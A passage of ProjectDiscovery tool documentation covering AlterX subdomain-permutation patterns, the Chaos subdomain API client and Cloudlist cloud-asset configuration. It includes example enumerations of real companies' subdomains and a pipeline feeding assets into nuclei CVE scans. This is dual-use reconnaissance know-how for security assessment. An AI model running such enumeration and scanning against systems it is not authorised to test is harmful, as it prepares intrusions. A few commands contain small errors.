- 'href="(.*)"'
group: 1
```
Finally the second template in the workflow will use the obtained value by referencing the extractor name (`extracted`):
```yaml
# template-using-named-extractor.yaml
id: value-sharing-template2
info:
name: value-sharing-template2
author: pdteam
severity: info
http:
- raw:
- |
GET /path2 HTTP/1.1
Host: {{Hostname}}
{{extracted}}
```
# AlterX Install
Learn how to install AlterX and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install github.com/projectdiscovery/alterx/cmd/alterx@latest
```
## Installation Notes
* AlterX requires the latest version of [**Go**](https://go.dev/doc/install)
# AlterX Overview
A fast and customizable subdomain wordlist generator
**AlterX** is a high-performance, customizable subdomain wordlist generator. It fits into common subdomain enumeration pipelines by using customizable patterns, not hardcoded ones.
For more details, check out [our blog introducing AlterX](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/) or view the [GitHub repo](https://github.com/projectdiscovery/alterx).
## Features
* **Fast and Customizable**: Generate subdomain wordlists tailored to your needs.
* **Automatic Word Enrichment**: Built-in enrichment to expand results.
* **Pre-defined Variables**: Use variables to simplify your patterns.
* **Configurable Patterns**: Modify patterns to match specific enumeration pipelines.
* **STDIN / List Input**: Accepts standard input and list files for easy integration.
## Support
Need help with **AlterX**? Whether it’s installation issues or feedback on a cool use case, we want to hear from you.
* Visit the [Help](/help) section for docs.
## Join the Community
If you have questions or want to discuss ProjectDiscovery with other developers, join us on [Discord](https://discord.com/invite/projectdiscovery).
Welcome to the ProjectDiscovery Discord Server!
Get support, share stories, and engage with the community.
# Running AlterX
Learn about running AlterX with details on variables and examples
## Basic Usage
For a detailed overview of **AlterX** options, visit the [Usage](/tools/alterx/usage) page.
If you have questions, feel free to reach out through our [Help](/help) page.
## Why AlterX?
What differentiates `alterx` from other subdomain permutation tools like `goaltdns` is its **scripting** feature. AlterX accepts patterns as input and generates subdomain permutation wordlists based on these patterns—similar to how [Nuclei](https://github.com/projectdiscovery/nuclei) works with [fuzzing-templates](https://github.com/projectdiscovery/fuzzing-templates).
Active Subdomain Enumeration is challenging due to the probability of finding actual existing domains. On a scale, this process can be visualized as:
```console
Using Wordlist < generate permutations with subdomains (goaltdns) < alterx
```
Most subdomain permutation tools rely on hardcoded patterns, generating massive wordlists that may contain millions of subdomains—making bruteforcing with tools like `dnsx` infeasible. With `alterx`, you can create patterns based on results from passive subdomain enumeration, significantly increasing the chances of finding valid subdomains and making brute-forcing more efficient.
## Variables
`alterx` uses variable-like syntax similar to nuclei-templates. You can create custom patterns using these variables . when domains are passed as input `alterx` evaluates input and extracts variables from it .
### Basic Variables
```yaml
{{sub}} : subdomain prefix or left most part of a subdomain
{{suffix}} : everything except {{sub}} in subdomain name is suffix
{{tld}} : top level domain name (ex com,uk,in etc)
{{etld}} : also know as public suffix (ex co.uk , gov.in etc)
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ------------ | ------------- | ------------------- | ------------------ |
| `{{sub}}` | `api` | `admin` | `cloud` |
| `{{suffix}}` | `scanme.sh` | `dev.scanme.sh` | `scanme.co.uk` |
| `{{tld}}` | `sh` | `sh` | `uk` |
| `{{etld}}` | `-` | `-` | `co.uk` |
### Advanced Variables
```yaml
{{root}} : also known as eTLD+1 i.e only root domain (ex for api.scanme.sh => {{root}} is scanme.sh)
{{subN}} : here N is an integer (ex {{sub1}} , {{sub2}} etc) .
// {{subN}} is advanced variable which exists depending on input
// lets say there is a multi level domain cloud.nuclei.scanme.sh
// in this case {{sub}} = cloud and {{sub1}} = nuclei`
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ---------- | ------------- | ------------------- | ------------------ |
| `{{root}}` | `scanme.sh` | `scanme.sh` | `scanme.co.uk` |
| `{{sub1}}` | `-` | `dev` | `-` |
| `{{sub2}}` | `-` | `-` | `-` |
## Patterns
In simple terms, a pattern is a `template` that describes what type of permutations AlterX should generate.
```console
// Below are some of example patterns which can be used to generate permutations
// assuming api.scanme.sh was given as input and variable {{word}} was given as input with only one value prod
// alterx generates subdomains for below patterns
"{{sub}}-{{word}}.{{suffix}}" // ex: api-prod.scanme.sh
"{{word}}-{{sub}}.{{suffix}}" // ex: prod-api.scanme.sh
"{{word}}.{{sub}}.{{suffix}}" // ex: prod.api.scanme.sh
"{{sub}}.{{word}}.{{suffix}}" // ex: api.prod.scanme.sh
```
You can find an example of a pattern configuration file [here](https://github.com/projectdiscovery/alterx/blob/main/permutations.yaml). This file is customizable based on your security assessments or penetration test requirements.
This configuration file generates subdomain permutations for security assessments or penetration tests using customizable patterns and dynamic payloads. Patterns include dash-based, dot-based, and others. Users can create custom payload sections, such as words, region identifiers, or numbers, to suit their specific needs.
For example, a user could define a new payload section `env` with values like `prod` and `dev`, then use it in patterns like `{{env}}-{{word}}.{{suffix}}` to generate subdomains like `prod-app.example.com` and `dev-api.example.com`. This flexibility allows tailored subdomain list for unique testing scenarios and target environments.
Default pattern config file used for generation is stored in `$HOME/.config/alterx/` directory, and custom config file can be also used using `-ac` option.
## Examples
An example of running alterx on existing list of passive subdomains of `tesla.com` yield us **10 additional NEW** and **valid subdomains** resolved using [dnsx](https://github.com/projectdiscovery/dnsx).
```console
$ chaos -d tesla.com | alterx | dnsx
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 8312 permutations in 0.0740s
auth-global-stage.tesla.com
auth-stage.tesla.com
digitalassets-stage.tesla.com
errlog-stage.tesla.com
kronos-dev.tesla.com
mfa-stage.tesla.com
paymentrecon-stage.tesla.com
sso-dev.tesla.com
shop-stage.tesla.com
www-uat-dev.tesla.com
```
Similarly `-enrich` option can be used to populate known subdomains as world input to generate **target aware permutations**.
```console
$ chaos -d tesla.com | alterx -enrich
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 662010 permutations in 3.9989s
```
You can alter the default patterns at run time using `-pattern` CLI option.
```console
$ chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21523 permutations in 0.7984s
```
You can also overwrite existing variable values using the `-payload` CLI options.
```console
$ alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21419 permutations in 1.1699s
```
For more information, check out the release **[blog](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/)**
Explore other subdomain permutation tools that might integrate well with your workflow:
* [altdns](https://github.com/infosec-au/altdns)
* [goaltdns](https://github.com/subfinder/goaltdns)
* [gotator](https://github.com/Josue87/gotator)
* [ripgen](https://github.com/resyncgg/ripgen/)
* [dnsgen](https://github.com/ProjectAnte/dnsgen)
* [dmut](https://github.com/bp0lr/dmut)
* [permdns](https://github.com/hpy/permDNS)
* [str-replace](https://github.com/j3ssie/str-replace)
* [dnscewl](https://github.com/codingo/DNSCewl)
* [regulator](https://github.com/cramppet/regulator)
# AlterX Usage
Learn AlterX usage including flags and filters
## Access help
Use `alterx -h` to display all of the help options.
## AlterX options
You can use the following command to see the available flags and options:
```console
Fast and customizable subdomain wordlist generator using DSL.
Usage:
./alterx [flags]
Flags:
INPUT:
-l, -list string[] subdomains to use when creating permutations (stdin, comma-separated, file)
-p, -pattern string[] custom permutation patterns input to generate (comma-seperated, file)
-pp, -payload value custom payload pattern input to replace/use in key=value format (-pp 'word=words.txt')
OUTPUT:
-es, -estimate estimate permutation count without generating payloads
-o, -output string output file to write altered subdomain list
-ms, -max-size int Max export data size (kb, mb, gb, tb) (default mb)
-v, -verbose display verbose output
-silent display results only
-version display alterx version
CONFIG:
-config string alterx cli config file (default '$HOME/.config/alterx/config.yaml')
-en, -enrich enrich wordlist by extracting words from input
-ac string alterx permutation config file (default '$HOME/.config/alterx/permutation_v0.0.1.yaml')
-limit int limit the number of results to return (default 0)
UPDATE:
-up, -update update alterx to latest version
-duc, -disable-update-check disable automatic alterx update check
```
# Chaos Install
Learn how to install Chaos and get started
Enter the command below in a terminal to install ProjectDiscovery's Chaos Client using Go.
```bash
go install -v github.com/projectdiscovery/chaos-client/cmd/chaos@latest
```
## Installation Notes
* Chaos requires the latest version of [**Go**](https://go.dev/doc/install)
# Chaos Overview
A Go Client to communicate with the Chaos API
Chaos is a comprehensive API dataset of DNS entries across the internet. Maintained by ProjectDiscovery, Chaos is actively updated and contains thousand of records.
Check out [our blog introducing Chaos](https://blog.projectdiscovery.io/introducing-chaos-bug-bounty-recon-data-api/), and learn more on the [Chaos website](https://chaos.projectdiscovery.io/)
## Support
Questions about using Chaos? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
Need Assistance?
We're here to help you! Explore the documentation or join the conversation.
# Running Chaos
Learn about running Chaos with details and an example
For all of the flags and options available for **Chaos** be sure to check out the [Usage](/tools/chaos/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
In order to get subdomains for a domain, use the following command.
```bash
chaos -d uber.com -silent
restaurants.uber.com
testcdn.uber.com
approvalservice.uber.com
zoom-logs.uber.com
eastwood.uber.com
meh.uber.com
webview.uber.com
kiosk-api.uber.com
utmbeta-staging.uber.com
getmatched-staging.uber.com
logs.uber.com
dca1.cfe.uber.com
cn-staging.uber.com
frontends-primary.uber.com
eng.uber.com
guest.uber.com
kiosk-home-staging.uber.com
```
## API Key
You can get your API key by either signing up or logging in at [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io?ref=api_key).
## API Key Environment variable
You can also set the API key as an environment variable in your bash profile.
```bash
export CHAOS_KEY=CHAOS_API_KEY
```
## Notes
* The API is rate-limited to 60 request / min / ip
* Chaos API **only** supports domain name to query.
# Chaos Usage
Learn Chaos usage including flags and filters
## Access help
Use `chaos -h` to display all of the help options.
## Chaos options
| Flag | Description | Example |
| ----------------------- | ---------------------------------------- | ------------------------------- |
| `-d` | Domain to find subdomains for | `chaos -d uber.com` |
| `-count` | Show statistics for the specified domain | `chaos -d uber.com -count` |
| `-o` | File to write output to (optional) | `chaos -d uber.com -o uber.txt` |
| `-json` | Print output as json | `chaos -d uber.com -json` |
| `-key` | Chaos key for API | `chaos -key API_KEY` |
| `-dL` | File with list of domains (optional) | `chaos -dL domains.txt` |
| `-silent` | Make the output silent | `chaos -d uber.com -silent` |
| `-version` | Print current version of chaos client | `chaos -version` |
| `-verbose` | Show verbose output | `chaos -verbose` |
| `-update` | updates to latest version | `chaos -up` |
| `-disable-update-check` | disables automatic update check | `chaos -duc` |
# Cloudlist Install
Learn how to install Cloudlist and get started
Enter the command below in a terminal to install ProjectDiscovery's Cloudlist using Go.
```bash
go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest
```
```bash
https://github.com/projectdiscovery/cloudlist/releases/
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* Cloudlist requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/cloudlist`
# Cloudlist Overview
A multi-cloud tool to identify assets across cloud service providers
Cloudlist is a multi-cloud tool for getting Assets from Cloud Providers. Cloudlist is designed for the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.
## Features
* List Cloud assets with multiple configurations
* Multiple Cloud providers support
* Multiple output format support
* Multiple filters support
* Highly extensible making adding new providers a breeze
* **stdout** support to work with other tools in pipelines
## Support
Questions about using Cloudlist? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Cloudlist Providers
Supported cloud providers
This guide offers insights into each supported provider, enabling you to leverage Cloudlist's capabilities to their fullest extent for comprehensive asset visibility and control.
## Major Cloud Providers
### AWS (Amazon Web Services)
Supported AWS Services:
* [EC2](https://aws.amazon.com/ec2/)
* [Route53](https://aws.amazon.com/route53/)
* [S3](https://aws.amazon.com/s3/)
* [Cloudfront](https://aws.amazon.com/cloudfront/)
* [ECS](https://aws.amazon.com/ecs/)
* [EKS](https://aws.amazon.com/eks/)
* [ELB](https://aws.amazon.com/elasticloadbalancing/)
* [ELBv2](https://aws.amazon.com/elasticloadbalancing/)
* [Lambda](https://aws.amazon.com/lambda/)
* [Lightsail](https://aws.amazon.com/lightsail/)
* [Apigateway](https://aws.amazon.com/api-gateway/)
**Example Config**:
Amazon Web Services can be integrated by using the following configuration block.
```yaml
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
# assume_role_name is the name of the role to assume (optional)
assume_role_name: $AWS_ASSUME_ROLE_NAME
# account_ids is the aws account ids which has similar assumed role name (optional)
account_ids:
- $AWS_ACCOUNT_ID_1
- $AWS_ACCOUNT_ID_2
```
`aws_access_key` and `aws_secret_key` can be generated in the IAM console. We recommend creating a new IAM user with `Read Only` permissions and providing the access token for the user.
Scopes Required: Read EC2, Route53, S3
**References:**
1. [https://docs.aws.amazon.com/IAM/latest/UserGuide/reference\_policies\_examples\_iam\_read-only-console.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_iam_read-only-console.html)
2. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_access-keys.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
3. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp\_request.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html)
* Aws Assume Role:
* [https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html](https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html)
* [https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role](https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role)
### GCP (Google Cloud Platform)
Supported GCP Services:
* [Cloud DNS](https://cloud.google.com/dns)
* [Kubernetes Engine](https://cloud.google.com/kubernetes-engine)
* [Compute Engine](https://cloud.google.com/products/compute)
* [Bucket](https://cloud.google.com/storage)
* [Cloud Functions](https://cloud.google.com/functions)
* [Cloud Run](https://cloud.google.com/run)
**Example Config:**
Google Cloud Platform can be integrated by using the following configuration block.
```yaml
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
```
`gcp_service_account_key` can be retrieved by creating a new service account. To do so, create service account with Read Only access to `cloudresourcemanager` and `dns` scopes in IAM. Next, generate a new account key for the Service Account by following steps in Reference 2. This should give you a json which can be pasted in a single line in the `gcp_service_account_key`.
Scopes Required: Cloud DNS, GKE
References:
1. [https://cloud.google.com/iam/docs/service-account-overview](https://cloud.google.com/iam/docs/service-account-overview)
### Azure
Supported Azure Services:
* Virtual Machines
**Example Config:**
Microsoft Azure can be integrated by using the following configuration block.
```yaml
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of registered application of the azure account (not requuired if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
```
`tenant_id`, `client_id`, `client_secret` can be obtained/generated from `All services` > `Azure Active Directory` > `App registrations`
`subscription_id` can be retrieved from `All services` > `Subscriptions`
To use cli auth set `use_cli_auth` value to `true` and run `az login` in the terminal
References:
1. [https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli](https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli)
2. [https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az\_ad\_sp\_create\_for\_rbac](https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az_ad_sp_create_for_rbac)
3. [https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli](https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli)
### Alibaba Cloud
Suppoted Alibaba Cloud Services:
* ECS Instances
**Example Config:**
Alibaba Cloud can be integrated by using the following configuration block.
```yaml
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
```
Alibaba Cloud Access Key ID and Secret can be created by visiting [https://ram.console.aliyun.com/manage/ak](https://ram.console.aliyun.com/manage/ak)
References:
1. [https://www.alibabacloud.com/help/faq-detail/142101.htm](https://www.alibabacloud.com/help/faq-detail/142101.htm)
2. [https://www.alibabacloud.com/help/doc-detail/53045.htm](https://www.alibabacloud.com/help/doc-detail/53045.htm)
## VPS & PaaS Hosting Providers
### DO (DigitalOcean)
Supported DigitalOcean Services:
* Instances
**Example Config:**
Digitalocean can be integrated by using the following configuration block.
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
```
`digitalocean_token` can be generated from the Digitalocean Control Panel. We recommend only giving Read Access to the token.
References:
1. [https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/](https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/)
### SCW (Scaleway)
Supported Scaleway Services:
* Instances
**Example Config:**
Scaleway can be integrated by using the following configuration block.
```yaml
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
```
`scaleway_access_key` and `scaleway_access_token` can be generated from the Credentials Options in scaleway console.
References -
1. [https://www.scaleway.com/en/docs/generate-api-keys/](https://www.scaleway.com/en/docs/generate-api-keys/)
### Heroku
Supported Heroku Services:
* Applications
**Example Config:**
Heroku can be integrated by using the following configuration block.
```yaml
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
```
`heroku_api_token` can be generated from [https://dashboard.heroku.com/account/applications/authorizations/new](https://dashboard.heroku.com/account/applications/authorizations/new)
It can also be created with the Heroku CLI by running:
```bash
$ heroku authorizations:create -d "brief description of token"
Creating OAuth Authorization... done
Client:
ID: a6e98151-f242-4592-b107-25fbac5ab410
Description: brief description of token
Scope: global
Token: cf0e05d9-4eca-4948-a012-b9xxxxxxxxxx
Updated at: Fri Jun 16 2021 13:26:56 GMT-0700 (PDT) (less than a minute ago)
```
References:
1. [https://devcenter.heroku.com/articles/platform-api-quickstart#authentication](https://devcenter.heroku.com/articles/platform-api-quickstart#authentication)
### Linode
Supported Linode Services:
* Instances
**Example Config:**
Linode can be integrated by using the following configuration block.
```yaml
- provider: linode # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
```
`linode_personal_access_token` can be created from [https://cloud.linode.com/id/tokens](https://cloud.linode.com/id/tokens). Minimum scope needed is `Read Only` for `Linodes` resource.
References:
1. [https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token](https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token)
## CDN & DNS Management
### Fastly
Supported Fastly Services:
* Services
**Example Config:**
Fastly can be integrated by using the following configuration block.
```yaml
- # provider is the name of the provider
provider: fastly
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
```
`fastly_api_key` can be generated from [https://manage.fastly.com/account/personal/tokens](https://manage.fastly.com/account/personal/tokens)
References -
1. [https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens](https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens)
### Namecheap
Supported Namecheap Services:
* Domain List
**Example Config:**
Namecheap can be integrated by using the following configuration block.
```yaml
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
```
Namecheap API Access can be enabled by visiting [https://ap.www.namecheap.com/settings/tools/apiaccess/](https://ap.www.namecheap.com/settings/tools/apiaccess/) and then:
* Toggle ON API Access switch
* Add your public IP to Whitelistted IPs
References:
1. [https://www.namecheap.com/support/api/intro/](https://www.namecheap.com/support/api/intro/)
* Enabling API Access
* Whitelisting IP
### Cloudflare
Supported Cloudflare Services:
* DNS
**Example Config:**
Cloudflare can be integrated by using the following configuration block.
```yaml
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
```
`api_key` can be generated from Cloudflare API Key manager. It needs to be Global API Key due to limitation of cloudflare new API tokens.
References:
1. [https://developers.cloudflare.com/api/keys](https://developers.cloudflare.com/api/keys)
### Hetzner Cloud
Supported Hetzner Cloud Services:
* Instances
**Example Config:**
Hetzner Cloud can be integrated by using the following configuration block.
```yaml
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# auth_token is the is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
```
References:
1. [https://docs.hetzner.cloud/#authentication](https://docs.hetzner.cloud/#authentication)
## Infrastructure Automation & Management
### Kubernetes (K8s)
Supported Kubernetes Services:
* Services
* Ingresses
**Example Config:**
To integrate Kubernetes, utilize the configuration block outlined below. This block allows you to specify Kubernetes connection details either through a file path or directly by providing the encoded kubeconfig content. If both kubeconfig\_file and kubeconfig\_encoded are specified, the kubeconfig\_encoded will take precedence.
```yaml
- provider: kubernetes # provider is the name of the provider
# id is the name of the provider id
id: staging
# kubeconfig_file is the path of kubeconfig file
kubeconfig: path/to/kubeconfig
# context is the context to be used from kubeconfig file
context:
```
References:
1. [https://www.redhat.com/sysadmin/kubeconfig](https://www.redhat.com/sysadmin/kubeconfig)
2. [https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html](https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html)
3. [https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information](https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information)
4. [https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store\_info](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store_info)
### Hashicorp Tools
With Cloudlist you can get assets from nomad, consul and terraform. Cloudlist can query Nomad and Consul directly, and will use the Terraform state file to list Terraform created assets.
#### Nomad
Hashicorp Nomad can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: nomad # provider is the name of the provider
# nomad_url is the url for nomad server
nomad_url: http:/127.0.0.1:4646/
# nomad_ca_file is the path to nomad CA file
# nomad_ca_file: .pem
# nomad_cert_file is the path to nomad Certificate file
# nomad_cert_file: .pem
# nomad_key_file is the path to nomad Certificate Key file
# nomad_key_file: .pem
# nomad_token is the nomad authentication token
# nomad_token:
# nomad_http_auth is the nomad http auth value
# nomad_http_auth:
```
Specifying https in the `nomad_url` automatically turns SSL to on. All the fields are optional except the `nomad_url`.
References:
1. [https://www.nomadproject.io/api-docs](https://www.nomadproject.io/api-docs)
#### Consul
Hashicorp Consul can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: consul # provider is the name of the provider
# consul_url is the url for consul server
consul_url: http://localhost:8500/
# consul_ca_file is the path to consul CA file
# consul_ca_file: .pem
# consul_cert_file is the path to consul Certificate file
# consul_cert_file: .pem
# consul_key_file is the path to consul Certificate Key file
# consul_key_file: .pem
# consul_http_token is the consul authentication token
# consul_http_token:
# consul_http_auth is the consul http auth value
# consul_http_auth:
```
Specifying https in the `consul_url` automatically turns SSL to on. All the fields are optional except the `consul_url`.
References:
1. [https://www.consul.io/api-docs](https://www.consul.io/api-docs)
#### Terraform
**Example Config:**
Terraform can be integrated by using the following configuration block.
```yaml
- provider: terraform # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
#tf_state_file is the location of terraform state file (terraform.tfsate)
tf_state_file: path/to/terraform.tfstate
```
### OpenStack
Supported OpenStack Services:
* Instances
**Example Config:**
```yaml
- provider: openstack # provider is the name of the provider
# id is the name of the provider id
id: staging
# identity_endpoint is OpenStack identity endpoint used to authenticate
identity_endpoint: $OS_IDENTITY_ENDPOINT
# domain_name is OpenStack domain name used to authenticate
domain_name: $OS_DOMAIN_NAME
# tenant_name is OpenStack project name
tenant_name: $OS_TENANT_NAME
# username is OpenStack username used to authenticate
username: $OS_USERNAME
# password is OpenStack password used to authenticate
password: $OS_PASSWORD
```
# Running Cloudlist
Learn about running Cloudlist with examples and support details
For all of the flags and options available for `cloudlist` be sure to check out the [Usage](/tools/cloudlist/usage) page. On this page you can find some examples with output, details of what 'cloudlist' supports, and details on configuration.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
```
cloudlist
```
This will list all the assets from configured providers in the configuration file. Specific providers and asset type can also be specified using `provider` and `id` filter.
```console
cloudlist -provider aws,gcp
________ _____ __
/ ____/ /___ __ ______/ / (_)____/ /_
/ / / / __ \/ / / / __ / / / ___/ __/
/ /___/ / /_/ / /_/ / /_/ / / (__ ) /_
\____/_/\____/\__,_/\__,_/_/_/____/\__/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Listing assets from AWS (prod) provider.
example.com
example2.com
example3.com
1.1.1.1
2.2.2.2
3.3.3.3
4.4.4.4
5.5.5.5
6.6.6.6
[INF] Found 2 hosts and 6 IPs from AWS service (prod)
```
## Running cloudlist with Nuclei
Scanning assets from various cloud providers with nuclei for security assessments:-
```bash
cloudlist -silent | httpx -silent | nuclei -t cves/
```
# Supported providers
For a full list of supported cloud providers, see [Cloud Providers](/tools/cloudlist/providers).
# Configuration file
The default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml` and has the following contents as an example. In order to run this tool, the keys need to updated in the config file for the desired providers.
## Example Provider Config
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# client_id is the client ID of registered application of the azure account (not requuired if using cli auth)
client_id: $AZURE_CLIENT_ID
# client_secret is the secret ID of registered application of the zure account (not requuired if using cli uth)
client_secret: $AZURE_CLIENT_SECRET
# tenant_id is the tenant ID of registered application of the azure account (not requuired if using cli auth)
tenant_id: $AZURE_TENANT_ID
#subscription_id is the azure subscription id
subscription_id: $AZURE_SUBSCRIPTION_ID
#use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
- provider: linode # provider is the name of the provider
